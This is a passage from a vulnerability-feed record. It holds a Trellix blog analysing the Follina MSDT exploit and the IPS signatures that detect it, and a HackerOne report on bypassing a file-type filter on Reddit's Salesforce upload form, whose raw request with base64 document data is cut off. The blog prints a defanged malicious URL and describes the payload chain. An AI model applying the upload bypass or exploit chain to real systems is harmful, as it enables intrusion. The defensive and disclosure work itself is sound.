2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features\n\nBy Vinay Kumar and Chintan Shah \u00b7 July 19, 2022\n\n## Executive summary\n\nDuring the end of May 2022, independent security researcher reported a vulnerability (assigned CVE-2022-30190) in Microsoft Support Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is called using URI protocol. The URI protocol **ms-msdt:/** could also be invoked from the malicious word document, which when opened by the victim, would allow malicious code to execute on the target machine with the privileges of the calling application. In response to the reported vulnerability, Microsoft released [the advisory and guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on disabling the MSDT URI protocol. Subsequently, the vulnerability, was patched in the [June security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) released by Microsoft. Since then, this vulnerability has been found to be exploited by multiple state actors in [targeted attack campaigns](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>).\n\nAt Trellix, we are committed to protecting our customers from upcoming and emerging threats on the network inclusive of those that are found being exploited in the wild. Trellix Network Security Platform\u2019s (Trellix NSP) Intrusion Prevention Research Team strives to build advanced detection features , improving product\u2019s overall Threat Detection capabilities.\n\nOver the next few sections of this blog, we will highlight couple of advanced detection features in Trellix NSP, which helps in protecting the customers against this and future attacks of similar nature.\n\n## Introduction \n\nMS Word document exploiting Microsoft Support Diagnostic Tool vulnerability ( CVE- 2022-30190 ) was first found to be [submitted to VT](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/>) on 27th May 2022 from Belarus with the file name **05-2022-0438.doc**. However, the number 0438 turns out to be the Area code of the region **Follina** in Italy and hence the name. Exploit document is not found to be connected to Italy in any way.\n\n![Sample submission history on VirusTotal](https://www.trellix.com/en-us/img/newsroom/stories/countering-follina-attack-1.jpg) Figure 1: Sample submission history on VirusTotal \n\n\nThere is no dearth of instances where one of the MS Office\u2019s core features, Object Linking and Embedding ( OLE ) have been abused as an initial attack vector and CVE-2022-30190 was no different. This was yet another classic example of chaining OLE with another logic flaw to achieve arbitrary code execution on the target machine. Traditionally, Object Linking and Embedding had significantly contributed to building weaponized office exploits, and we believe this will continue to happen. As with previous CVE-2021-40444 and many other exploits, OLE was found to be used for linking the document to the externally hosted object, in this case, html file. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) mentions that an Office Open XML document facilitates embedding objects or link to external objects which can be specified via relationships. Any embedded or linked object specified in the container application ( OOXML document in this case ) must be identified by its unique **ProgID** string. As per the specifications, this string must be used to determine the type and the application used to load the object data. An excerpt from the document specifications is as shown below:\n\n![Specs on Embedded objects](https://www.trellix.com/en-us/img/newsroom/stories/countering-follina-attack-2.jpg) Figure 2: Specs on Embedded objects \n\n\nAs documented in the [ISO-29500-4 specifications](<https://standards.iso.org/ittf/PubliclyAvailableStandards/c071692_ISO_IEC_29500-4_2016.zip>) ST_OLEType defines the type of the OLE object in **document.xml**, either linked or embedded and the **ProgID=\u201dhtmlfile\u201d** indicates the type of linked object data. As shown in the CVE-2022-30190 exploit document below, **document.xml.rels** file with Type attribute specifying relationship as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted potentially malicious object and invoke the respective protocol handlers for rendering the object which could lead to the exploitation of potential logic flaws in object renderers.\n\n![Structure of exploit document](https://www.trellix.com/en-us/img/newsroom/stories/countering-follina-attack-3.jpg) Figure 3: Structure of exploit document \n\n\nAs we notice the document.xml.rels file, it contains an external reference to the malicious domain for retrieving the html file :\n\n**hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!**. Hosted html file on this domain contains script block with commented lines. This is required for making the HTML file sufficiently sized ( precisely greater than 4KB ) to be able to get it processed and rendered by mshtml.dll. \n\n![downloaded html file from server](https://www.trellix.com/en-us/img/newsroom/stories/countering-follina-attack-4.jpg) Figure 4: downloaded html file from server \n\n\nSubsequently, script tries to invoke PCWDiagnostic package using MSDT URI protocol handler with multiple arguments out of which one argument is IT_BrowseForFile which can take embedded PowerShell script within $( ) as an argument , resulting into code execution. PowerShell script is Base64 encoded and decoded form is of the script is as shown below. \n\n![Decoded PowerShell script](https://www.trellix.com/en-us/img/newsroom/stories/countering-follina-attack-5.jpg) Figure 5: Decoded PowerShell script \n\n\nAs we see in the decoded payload, the script is intended to run the malicious rgb.exe on the target system. Summarizing the sequence involved in the attack:\n\n * Malicious MS office document with linked object is delivered to the victim possibly, as a part of phishing campaign.\n * On clicking the document, malicious HTML script is rendered, leading to arbitrary code execution on the affected system. \n\nWindows system registers innumerable number of URI protocol handlers which could be potentially abused to exploit similar flaws. For instance, [search-ms](<https://docs.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>) URI protocol handler , used to query windows search indexing feature can be abused by the attackers to connect to the remote SMB share on the attacker-controlled server. However, it does not directly lead to code execution as it requires multiple levels of user interaction, but a query can be crafted to lure the users to execute legitimate looking executables as shown below. Both these of URI protocol attacks were first [reported here](<https://benjamin-altpeter.de/shell-openexternal-dangers/>).\n\n![search-ms query to connect to remote location](https://www.trellix.com/en-us/img/newsroom/stories/countering-follina-attack-6.jpg) Figure 6: search-ms query to connect to remote location \n\n\n**How Trellix NSP protects against Follina**\n\nTrellix NSP has been one of the most advance and mature IPS in the security industry. Over a period, we developed some of the cutting-edge features to deal with complex attack scenarios which involved handling encoding, compressions, and complex file formats. **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** being some of these. We use combination of these advance capabilities to detect entire attack cycle. In the following sections, we will try to understand how Trellix Network Security Platform\u2019s advanced inspection capabilities highlighted above can help correlate multiple low or medium severity events to detect phases in the attack cycle, thereby raising overall confidence level.\n\n**Microsoft Open Office XML(OOXML) file format**\n\nOLE File format which was traditionally used in Microsoft office is replaced with Office open xml. Office Open XML (OOXML) is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word processing documents. In a nutshell this means that the whole document is contained in a zip package. Multiple files and directories together form the document. There are directories like _[Content_Types].xml , _rels, docProps_, which are basic part of all office zip packages, and then there is a directory specific to document type _(word directory for docx, xl and ppt directory for xlsx and pptx respectively)_. For each of the document type the specific directory would contain different files limited to the type. Like in case of a docx type, the \u2018word\u2019 directory contains document.xml file which has the core content of the document. Here is a brief overview about important files under these directories: \n\n**[Content_Types].xml** \nThis file contains the MIME type information for parts of the package. It uses defaults for certain file extensions and overrides for parts specified by Internationalized Resource Identifier.\n\n**_rels** \nThis directory contains the relationship information for files within the package.\n\n**_rels/.rels** \nThis is the location where applications look first to find the package relationships.\n\n**docProps/core.xml** \nThis file contains the core properties for any Office Open XML document.\n\n**word/document.xml** \nThis file is the main part for any Word document.\n\nZip file format specification specifies that a file in the zip archive is stored in a file record structure. For each file in the zip archive, there is a corresponding entry of this structure. \n\n[local file header 1] \n[file data 1] \n[data descriptor 1] \n. \n. \n. \n[local file header n] \n[file data n] \n[data descriptor n] \n \n[archive decryption header] \n[archive extra data record] \n[central directory header 1] \n. \n. \n. \n[central directory header n] \n[zip64 end of central directory record] \n[zip64 end of central directory locator] \n[end of central directory record]\n\nThese structures are placed one after another, structure starts with local file header followed by optional Extra Data Fields and file data (optionally compressed/optionally encrypted). Local header contains details about the file data, encryption/compression mechanism along with filename, file size and few more things.\n\n**Local file header**\n\nOffset | Byte | Description \n---|---|--- \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n8 | 2 | Compression method \n10 | 2 | File last modification time \n12 | 2 | File last modification date \n14 | 4 | CRC-32 \n18 | 4 | Compressed size \n22 | 4 | Uncompressed size \n26 | 2 | File name length (n) \n28 | 2 | Extra field length (m) \n30 | n | File Name \n30+n | m | Extra Field \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n \n \n\n\nFor Microsoft documents, deflate compression is used commonly. In a nutshell, the files which constitutes the document are stored in possibly encrypted/compressed format inside the zip package. In the figure below, we dissect this structure for document.xml file present under word directory with a hex editor (010 editor) with zip parsing capabilities which will help us to investigate the details \u2013\n\n![Structure for document.xml](https://www.trellix.com/en-us/img/newsroom/stories/countering-follina-attack-7.jpg) Figure 7: Structure for document.xml \n\n\n**Need for deep file inspection**\n\nWe have seen in the past that different vulnerabilities may require the IPS devices to examine the content of the different files present inside zip package. Same is the case with Follina. As explained earlier, this vulnerability abuses Microsoft OOXML **Object Linking and Embedding** functionality linking a file to external resource via the relationship file to load malicious content. Hence it requires the detection device to check the external references used in word/rels/document.xml.rels file. \n\n![Structure of document.xml.rels](https://www.trellix.com/en-us/img/newsroom/stories/countering-follina-attack-8.jpg) Figure 8: Structure of document.xml.rels \n\n\nSince this file is present, as a compressed entity in the zip archive, a meaningful detection with IPS cannot be done until the file is decompressed. With NSP\u2019s unique in industry capability, known as Deep File inspection, this is possible. \n\nThis is implemented using protocol parsing capability of the NSP. The local file header structure for the specific file is parsed and the compressed data of the file is decoded. This feature can be used by enabling it from the inspection option policy.\n\n![Policy configuration to enable MS Office Deep File Inspection](https://www.trellix.com/en-us/img/newsroom/stories/countering-follina-attack-9.jpg) Figure 9: Policy configuration to enable MS Office Deep File Inspection \n\n\n_For more details, please refer to NSP documentation_\n\n**Some of the key highlights: deep file inspection **\n\n * This feature helps to decompress the file contents inline; the complete file is not required to be downloaded for inspection \n * It also gives the flexibility to decompress only the content of a selected file (individual file present inside zip achieve), yielding better performance since the whole zip archive is not required to be decompressed .\n * The individual files (which are part of zip package) can be controllably decompressed by specifying byte limit per file. This plays a great role in improving performance while doing inline inspection.\n\nTrellix NSP Attack ID **0x452a8400 - HTTP: OLE Object Linking Detected in OOXML File** \u2013 uses the Microsoft Office Deep file inspection feature to detect signs of external object linking. However, just checking for external OLE references will not be sufficient until it is ascertained that the external URI does the malicious activity. Since we know that external URI loads the HTML which invokes the MSDT handler in a malicious fashion. \n\nInvoking MSDT through HTML content is detected by Trellix NSP Attack ID **0x452ac200 \u2013 HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190)**\n\n**Detecting the attack chain using multi attack ID Correlation**\n\nThe attack visualization is better when the dots can be connected between different stages of the attack. Multi Attack ID Correlation capability helps achieve this by correlating multiple attacks. \n\nTrellix NSP Attack ID **0x43f02000 HTTP: Microsoft Support Diagnostic Tool RCE Vulnerability (CVE-2022-30190)** utilizes this capability and correlates \u201cHTTP: OLE Object Linking Detected in OOXML File (0x452a8400) \u201d and \u201cHTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (0x452ac200)\u201d to generate corelated attack event. \n\nThe alert generated using Multi AID correlation is of high confidence and severity and helps security admins to take further actions. This feature is built into Trellix NSP by default and there is no extra configuration required to enable it. \n\n**Some of the key highlights: multi attack ID Correlation **\n\n * Two or more attacks can be correlated \n * Provides capability to quarantine the attacker (configurable from the policy)\n * Correlation using attributes like \u2013 \n * source-IP/destination IP: This attribute helps correlating attack originating from same source IP and/or targeted to the same destination IP .\n * Lifetime: max time interval in which all correlation signature event should occur\n * Threshold: Detection of attack happening repeatedly in a specific period.\n\nWith these strong correlation capabilities for the complete attack cycle, Trellix Network Security Platform\u2019s Threat Detection solution balances the effectiveness and performance extremely well. The Trellix NSP research and Engineering team actively monitors and keeps an eye on emerging threat patterns ,builds the features and capabilities to enhance overall detection efficacy of the Intrusion Prevention System. \n\n## Conclusion \n\nWe have seen multiple vulnerabilities in the past using exploitation techniques similar in nature and this is yet another addition to the series. In our previous blog, outlining the current state of memory corruption vulnerabilities and the challenges faced in exploiting them, we also highlighted the exploitation strategies of the future and the **Follina** attack very well validates our prediction. While exploiting different classes of memory corruption vulnerabilities can be eliminated by introducing mitigations as either operating system or hardware level, vulnerabilities exploiting design flaws will remain a challenge. Perimeter and endpoint security solutions will have to evolve to address those challenges by introducing the innovative inspection and detection techniques alongside applying secure software design and development practices during application development. \n", "cvss3": {}, "published": "2022-07-19T00:00:00", "type": "trellix", "title": "Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-07-19T00:00:00", "id": "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-08-25T13:22:10", "bounty": 100.0, "description": "## Summary:\nReddit.secure.force.com is Reddit SalesForce instance. Attacker is able to send attachments of disallowed filetypes to this server. The attacker is able to send malicious documents such as CVE-2022-30190 Follina to the victim.\n\n## Impact:\nAttacker can send malicious files to whoever handles the form behind https://reddit.secure.force.com/adhelp\n\n## Steps To Reproduce:\n 1. Go to https://reddit.secure.force.com/adhelp \n 2. Notice that the specified allowed filetype is: jpg jpeg gif png pdf as you can see with the image below: \n\n{F1780944}\n\n 3. If you try dragging and dropping a docx file to that box, there is a Javascript which forbids such action. But if you used the \"Click to browse\" option you can start uploading the file.\n\n{F1780957}\n\n4. The file upload request: \n\n```http\nPOST /adhelp/apexremote HTTP/1.1\nHost: reddit.secure.force.com\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://reddit.secure.force.com/adhelp/\nX-User-Agent: Visualforce-Remoting\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 15301\nOrigin: https://reddit.secure.force.com\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"action\":\"AdvertisingHelpController\",\"method\":\"uploadFile\",\"data\":[\"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